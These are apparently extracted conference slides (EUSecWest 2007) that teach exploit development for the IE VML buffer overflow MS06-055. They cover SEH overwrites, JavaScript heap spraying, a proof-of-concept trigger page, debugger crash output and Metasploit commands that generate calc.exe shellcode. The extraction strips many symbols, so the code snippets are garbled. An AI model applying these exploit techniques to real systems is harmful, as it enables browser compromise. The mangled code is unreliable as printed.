More on Metasploit plugins from vulnerability to exploit

1
More on Metasploit pluginsfrom vulnerability to
exploit

• Saumil Shah
• ceo, net-square
• EUSecWest - London 2007

2
who am i

• Saumil Shah - "krafty"
• ceo, net-square solutions
• saumil_at_saumil.net
• author "Web Hacking - Attacks and Defense"

who am i 1608 up 426, 1 user, load
averages 0.28 0.40 0.33 USER TTY FROM
LOGIN_at_ IDLE WHAT saumil console -
1143 005 bash
3
From Vulnerability to Exploit
Fuzzing
Debugger
Attack Vector
EIP 0x41414141
Reliable EIP return address
Bad characters
Final Shellcode
Test Shellcode (INT 3)
Working exploit
INT 3?
Shellcode Handling
4
The CPU's registers

• The Intel 32-bit x86 registers

ESP
EAX
accumulator
stack pointer
EBP
EBX
base
base pointer
ESI
ECX
counter
source index
EDI
EDX
data
destination index
EIP
instruction pointer
5
The Process Memory Map
.text
0x08000000
.data
.bss
heap - malloc'ed data

v heap stack

main() local vars
argc
argv
envp
cmd line arguments
environment vars
0xc0000000
6
Win32 Process Memory Map
0x00000000
error trapping
0x00010000
program image
heap
stack
0x40000000
DLLs
DLLs
DLLs
0x7FFDE000
First TEB
0x7FFDF000
PEB
0x7FFE0000
Shared user page
0x7FFE1000
No access
0x7FFFFFFF
7
Getting control of EIP

• Stack overflows
• Heap overflows
• Format string bugs
• Integer overflows

8
Getting control of EIP

• Overwrite saved return address
• saved EIPs in stack frames
• Overwrite exception handlers
• SEH overwrites
• Arbitrary memory overwrites
• Controlling "what" and "where"

9
Browser overflows

• Client-side exploits are becoming the rage.
• ActiveX components.
• Media handlers / libraries.
• Toolbars / Plugins.
• Platform specific characteristics.
• Overflows delivered as HTTP responses.
• "Surf-n-crash".

10
Browser overflows

• Javascript / Vbscript helps in targeting
  vulnerable components
• and building up the exploit on-the-fly.
• Javascript is always enabled these days.

11
Exploit example - IE VML overflow

• Buffer overflow in IE's VML implementation
• MS06-055
• ltvfillmethod"AAAAAAAA"gt
• Exploiting IE 6 on XP SP2
• Triggering the exploit by overwriting SEH

12
Windows SEH

• SEH - Structured Exception Handler
• Windows pops up a dialog box
• Default handler kicking in.

13
Exception handling

• Try / catch block
• Pointer to the exception handling code also saved
  on the stack, for each code block.

try code that may throw
an exception. catch
attempt to recover from the
exception gracefully.
14
Exception handling implementation
exception handler code (catch block)
local vars
saved EBP
saved EIP
params
frame w/ exception handling
addr of exception handler
more frames
Bottom of stack
15
SEH Record

• Each SEH record is of 8 bytes
• These SEH records are found on the stack.
• In sequence with the functions being called,
  interspersed among function (block) frames.
• WinDBG command - !exchain

ptr to next SEH record
address of exception handler
16
SEH Chain

• Each SEH record is of 8 bytes

ex_handler1()
ptr to SEH_record_2
addr of ex_handler1
ex_handler2()
ptr to next SEH_record_n
addr of ex_handler2
MSVCRT!exhandler
0xFFFFFFFF
default exception handler
bottom of stack
17
SEH on the stack
stack
func_z()
ex_handler_z()
ptr to next SEH record
address of exception handler
main()
MSVCRT!exhandler
initial entry frame
0xFFFFFFFF
address of exception handler
18
Yet another way of getting EIP

• Overwrite one of the addresses of the registered
  exception handlers
• and, make the process throw an exception!
• If no custom exception handlers are registered,
  overwrite the default SEH.
• Might have to travel way down the stack
• but in doing so, you get a long buffer!

19
Overwriting SEH
buffer
ex_handler()
saved EIP
saved EBP
params
ptr to next SEH record
address of exception handler
20
Overwriting SEH
AAAA AAAA AAAA
ex_handler()
Illegal memory access
AAAA
AAAA
causes segmentation fault. OS invokes
registered exception handler in the chain
AAAA
AAAA
AAAA
AAAA AAAA AAAA
EIP 0x42424242
21
Stage 1

• proof of concept

ltheadgt ltobject id"VMLRender"
classid"CLSID10072CEC-8CC1-11D1-986E-00A0C955B42
E"gt lt/objectgt ltstylegtv\ behavior
url(VMLRender) lt/stylegt lt/headgt ltbodygt ltvrect
style'width120ptheight80pt'
fillcolor"red"gt ltscriptgt document.write("ltvfill
method \"") for(i 0 i lt 2625 i)
document.write("x4141x4141x4141x4141") do
cument.write("\"gt") lt/scriptgt lt/vrectgtlt/vfillgtlt
/bodygt
22
Setting up the exploit

• Serve up the exploit page over HTTP
• Point IE and surf to the page
• with a debugger attached to it

./daemon.pl ie_vml1.html Starting HTTP
server on 8080
23
Crashing IE

• Surf-n-crash

(18c.584) Access violation - code c0000005
(first chance) eax0013b4c4 ebx001df20c
ecx0013b4b8 edx00004141 esi0000259e
edi00140000 eip5deded1e esp0013b4a0
ebp0013b6c8 iopl0 nv up ei pl nz na po
nc cs001b ss0023 ds0023 es0023 fs003b
gs0000 efl00000206 vgx!DllMain_gdi
plus0x30e8d 5deded1e 668917 mov
edi,dx ds0023001400006341 0000
gt !exchain 0013e420 41414141 Invalid exception
stack at 41414141 0000gt g (18c.584) Access
violation - code c0000005 (first
chance) eax00000000 ebx00000000 ecx41414141
edx7c9037d8 esi00000000 edi00000000 eip4141414
1 esp0013b0d0 ebp0013b0f0 iopl0 nv up
ei pl zr na po nc cs001b ss0023 ds0023
es0023 fs003b gs0000
efl00000246 41414141 ?? ???
24
EIP 0x41414141

• We control EIP.
• Where do you want to go?
• Direct return to stack?
• XP SP2 doesn't allow it.
• Jump through registers?
• EDX ESP and EBP are the only possible optionsbut
  they don't point to our buffer.
• Other registers are cleared, thanks to XP SP2.
• XP SP2 also forbids jumping into DLLs.

25
How do we pull it off?

• In other circumstances, we'd have to go through
  long tedious routes
• or publish a DoS exploit and call it a day.
• L4m3
• We are exploiting a browser.
• Browsers run Javascript.
• Javascript has arrays.
• Javascript arrays occupy heap memory.

26
Loading our buffer in the heap

• Can we load our shellcode in the heap via
  Javascript?
• How do we know where our buffer lies?
• Direct jump into heap?
• yes! that is possible.

27
Heap Spraying

• Technique pioneered by Skylined.
• Make a VERY large NOP sled.
• Append shellcode at its end.
• Create multiple instances of this NOP sled in the
  heap memory.
• using Javascript arrays a0 str a1 str
• The heap gets "sprayed" with our payloads.
• Land somewhere in the NOPs, and you win.

28
Heap Spraying
NOP sled
a7
ltscriptgt spray build_large_nopsled() a
new Array() for(i 0 i lt 100 i) ai
spray shellcode lt/scriptgt lthtmlgt
exploit trigger condition goes here lt/htmlgt
shellcode
a8
NOP sled
shellcode
a9
NOP sled
shellcode
29
Tips on Heap Spraying

• Make really large NOP sleds
• approx 800,000 bytes per spray block
• Adjust the size of the NOP sled to leave very
  little holes inbetween spray blocks.
• Javascript Unicode encoding works great for
  shellcode.
• shellcode unescape("uXXXXuXXXX")
• Null bytes are not a problem anymore.

30
Stage 2

• Placeholder INT3 shellcode.
• Look for "90 90 90 90 cc cc cc cc" in the memory
  after IE crashes.

0000gt s 02000000 l fffffff 90 90 90 90 cc cc cc
cc 02150020 90 90 90 90 cc cc cc cc-cc cc cc cc
cc cc cc cc ................ 02360020 90 90 90
90 cc cc cc cc-cc cc cc cc cc cc cc cc
................ 02570020 90 90 90 90 cc cc cc
cc-cc cc cc cc cc cc cc cc ................ 02780
020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc
cc ................ 02990020 90 90 90 90 cc cc
cc cc-cc cc cc cc cc cc cc cc ................ 02
ba0020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc
cc cc ................ 02db0020 90 90 90 90 cc
cc cc cc-cc cc cc cc cc cc cc cc
................ 02fc0020 90 90 90 90 cc cc cc
cc-cc cc cc cc cc cc cc cc ................ 031d0
020 90 90 90 90 cc cc cc cc-cc cc cc cc cc cc cc
cc ................ 033e0020 90 90 90 90 cc cc
cc cc-cc cc cc cc cc cc cc cc ................

31
Jump to heap

• We can point EIP to any of the sprayed blocks.
• Arbitrarily choose addresses
• 0x03030303
• 0x04040404
• 0x05050505etc.
• Verify if they land in the NOP zones.

32
Stage 3

• Overwrite SEH record with 0x05050505.
• INT 3 shellcode.
• Causes EIP to land into one of the NOP zones
• and eventually reach our dummy shellcode.

33
Stage 3

• Overwriting SEH

0000gt g (148.360) Access violation - code
c0000005 (first chance) First chance exceptions
are reported before any exception handling. This
exception may be expected and handled. eax0013b64
8 ebx001dbc94 ecx0013b63c edx00000505
esi000024dc edi00140000 eip5deded1e
esp0013b624 ebp0013b84c iopl0 nv up ei
pl nz na pe nc cs001b ss0023 ds0023 es0023
fs003b gs0000 efl00000202 vgx!Dl
lMain_gdiplus0x30e8d 5deded1e 668917
mov edi,dx ds002300140000634
1 0000gt !exchain 0013e5a4 05050505 Invalid
exception stack at 05050505
34
Stage 3

• Landing in the NOP zoneand INT 3

0000gt db 0x05050505 05050505 90 90 90 90 90 90
90 90-90 90 90 90 90 90 90 90 ................ 05
050515 90 90 90 90 90 90 90 90-90 90 90 90 90 90
90 90 ................ 0000gt g (148.360)
Break instruction exception - code 80000003
(first chance) eax00000000 ebx00000000
ecx05050505 edx7c9037d8 esi00000000
edi00000000 eip05230024 esp0013b254
ebp0013b274 iopl0 nv up ei pl zr na po
nc cs001b ss0023 ds0023 es0023 fs003b
gs0000 efl00000246 05230024 cc
int 3 0000gt u 05230024 cc
int 3 05230025 cc int
3 05230026 cc int 3
35
Introducing Metasploit

• An advanced open-source exploit research and
  development framework.
• http//metasploit.com
• Current stable version 2.7
• Written in Perl, runs on Unix and Win32 (cygwin)
• Brand new 3.0
• Complete rewrite in Ruby

36
Introducing Metasploit

• Generate shellcode.
• Shellcode encoding.
• Shellcode handlers.
• Scanning binaries for specific instructions
• e.g. POP/POP/RET, JMP ESI, etc.
• Ability to add custom exploits, shellcode,
  encoders.
• and lots more.

37
Enter Shellcode

• Code assembled in the CPU's native instruction
  set.
• Injected as a part of the buffer that is
  overflowed.
• Most typical function of the injected code is to
  "spawn a shell" - ergo "shellcode".
• A buffer containing shellcode is termed as
  "payload".

38
Writing Shellcode

• Need to know the CPU's native instruction set
• e.g. x86 (ia32), x86-64 (ia64), ppc, sparc, etc.
• Tight assembly language.
• OS specific system calls.
• Shellcode libraries and generators.
• Metasploit Framework.

39
A little about shellcode

• Types of shellcode
• Bind shell
• Exec command
• Reverse shell
• Staged shell, etc.
• Advanced techniques
• Meterpreter
• Uploading and running DLLs "in-process"
• etc.

40
Payload Encoders

• Payload encoders create encoded shellcode, which
  meets certain criteria.
• e.g. Alpha2 generates resultant shellcode which
  is only alphanumeric.
• Allows us to bypass any protocol parsing
  mechanisms / byte filters.
• An extra "decoder" is added to the beginning of
  the shellcode.
• size may increase.

41
Payload Encoders

• Example Alpha2 encoding
• Transforms raw payload into alphanumeric only
  shellcode.
• Decoder decodes the payload "in-memory".

original shellcode (ascii 0-255)
decoder
UnWQ89Jas281EEIIkla2wnhaAS901las
42
Payload Encoders

• Metasploit offers many types of encoders.
• Work around protocol parsing
• e.g. avoid CR, LF, NULL
• toupper(), tolower(), etc.
• Defeat IDS
• Polymorphic Shellcode
• Shikata Ga Nai

43
Using Metasploit to generate shellcode

• We need Javascript Unicode encoded shellcode.
• No encoding needed
• We will run "calc.exe"
• msfpayload - cmdline shellcode generation.
• msfencode - cmdline shellcode encoder.
• jsencode.pl - wrapper around Metasploit's
  PexUtilsJSUnescape() function.

44
Generate calc.exe shellcode

• Generate JSencoded shellcode
• Final version contains working shellcode.
• A slight problem
• too many CALCs!

./msfpayload win32_exec EXITFUNC"seh"
CMD"calc.exe" R ./jsencode.pl
45
Exit function - "thread" vs. "seh"

• Exiting via SEH causes the whole thing to repeat
  itself.
• Re-generate the shellcode using EXITFUNC"thread"

./msfpayload win32_exec EXITFUNC"thread"
CMD"calc.exe" R ./jsencode.pl
46
Writing Metasploit exploit modules

• Integration within the Metasploit framework.
• Multiple target support.
• Dynamic payload selection.
• Dynamic payload encoding.
• Built-in payload handlers.
• Can use advanced payloads.
• a highly portable, flexible and rugged exploit!

47
How Metasploit runs an exploit
List of known target values
user supplied exploit info
Metasploit Shellcode Library
Encoders
Payload handlers
48
Writing a Metasploit exploit

• Perl module (2.7), Ruby module (3.0)
• Pre-existing data structures
• info, advanced
• Constructor
• sub new
• Exploit code
• sub Exploit

49
Structure of the exploit perl module
package MsfExploitname use base
"MsfExploit" use strict use PexText my
advanced my info sub new
sub Exploit
information block
constructor return an instance of our exploit
exploit block
50
info

• Name
• Version
• Authors
• Arch
• OS
• Priv
• UserOpts

• Payload
• Encoder
• Refs
• DefaultTarget
• Targets
• Keys

51
Metasploit Pex

• Perl EXtensions.
• ltmetasploit_homegt/lib/Pex.pm
• ltmetasploit_homegt/lib/Pex/
• Text processing routines.
• Socket management routines.
• Protocol specific routines.
• These and more are available for us to use in our
  exploit code.

52
Pex Utilities

• PexText
• Encoding and Decoding, Pattern Generation, Random
  text generation, Padding, etc
• PexSocket
• TCP, UDP, SSL TCP, Raw UDP
• Protocol specific utilities
• SMB, DCE RPC, Sun RPC, MSSQL, etc

53
Pex - miscellaneous utilities

• PexUtils
• Array and hash manipulation
• Bit rotates
• Read and write files
• Format String generator
• Create Win32 PE files
• Create Javascript arrays
• a whole lot of miscellany!

54
Finished examples

• my_ie_vml.pm

55
New in Version 3.0

• msfd
• Metasploit daemon, allows for client-server
  operation of Metasploit.
• msfopcode
• command line interface to Metasploit's online
  opcode database.
• msfwx
• a GUI interface using wxruby.

56
New in Version 3.0

• New payloads, new encoders.
• Ruby extension - Rex (similar to Pex)
• NASM shell.
• Back end Database support.
• whole lot of goodies here and there.

57
Thank You!

• Saumil Shah
• saumil_at_saumil.net
• http//net-square.com
• 91 98254 31192